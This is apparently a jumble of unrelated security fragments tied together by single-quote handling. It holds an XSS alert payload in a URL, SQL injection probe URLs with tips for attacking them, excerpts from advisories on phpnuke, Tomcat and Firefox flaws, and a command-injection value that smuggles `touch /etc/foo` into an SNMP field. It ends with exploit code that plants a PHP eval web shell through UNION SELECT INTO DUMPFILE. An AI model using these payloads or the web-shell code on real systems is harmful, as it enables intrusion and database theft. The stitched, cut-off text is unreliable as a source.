errMsg.asp?msg="><script>alert('Aria-Security')</script>
[Other Advanced SQL Injection]
* AboutUs.asp?id=-1'
Unclosed quotation mark? use it.
*SubCategory.asp?ID=-1'
Unclosed quotation mark? use it.
HINT: suppose the first column name is a.BrochureName
107. err(oc_('Submission ID or password entered is incorrect'));
108. }
109. $_POST = array_merge($_POST, mysql_fetch_assoc($anr));
User input passed through $_POST['pid'] seems correctly sanitised by the safeSQLstr() function, but in the query
at line 105 single quotes aren't used before concatenate the user input into the query string. This can be
exploited to conduct a Blind SQL Injection attack. Successful exploitation of this vulnerability requires at
least a record into the 'paper' table, and 'Edit Submission' to be enabled.
[-] Disclosure timeline:
WHERE `aid`='$a_aid' AND `pwd`='$a_pas'"));
------------>[/source code]<-----------
As many times before in phpnuke insecurities history the attack comes through
base64 encoding/decoding. After base64_decode() there can be single quotes in
"$abadmin", but no variable sanitize applied! And it is easy to see sql
injection possibilities here. This can lead to stealing arbitrary information
from underlying database, inlcuding admin username and password md5 hash.
Next step can be cracking hash to reveal plaintext password or using md5 hash
directly for cookie manipulation, both leading to gain phpnuke admin privileges.
Multiple cross-site scripting vulnerabilities in the Manager and Host
Manager web applications allow remote authenticated users to inject
arbitrary web script or HTML (CVE-2007-2450).
Tomcat treated single quotes as delimiters in cookies, which could
cause sensitive information such as session IDs to be leaked and allow
remote attackers to conduct session hijacking attacks (CVE-2007-3382).
Tomcat did not properly handle the " character sequence in a cookie
value, which could cause sensitive information such as session IDs
> http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx
Although it's amusing Firefox filters '"' in this prompt to begin with,
rather than designing it more wisely not to render attacker-controlled
text inline (use a table view below instead!), I'm not sure that the
ability to use single quotes (or other homoglyphs) makes the attack
considerably more dangerous.
Note that any person familiar with the dialog is unlikely to be confused
by this prompt, as a clear indication of the originating site, consistent
with the design of this dialog, is preserved ("...at
The core of the problem is using Perl EP3 with templates containing substitutions similar to
$val='NEW_VALUE';
without first escaping single quotes in NEW_VALUE;
As an example, the SNMP community string configuration accepts the following value as an allowed source of SNMP requests:
"none'.`touch /etc/foo`.'"
}
function export_sh() {
global $url, $prefix, $my_path, $ck;
//change php code if you want
$_enc = my_encode("<?php eval(\$_GET[c]);?>"); //just for the purpose of hiding from the eye, you have to use single quotes for INTO DUMPFILE
$_sql = "-99999 UNION SELECT null,$_enc,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null INTO DUMPFILE '".$my_path."/sh.php' FROM ".$prefix."_forum_forums";
$_sql = urlencode($_sql);
$_o = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err_ii($o)) {
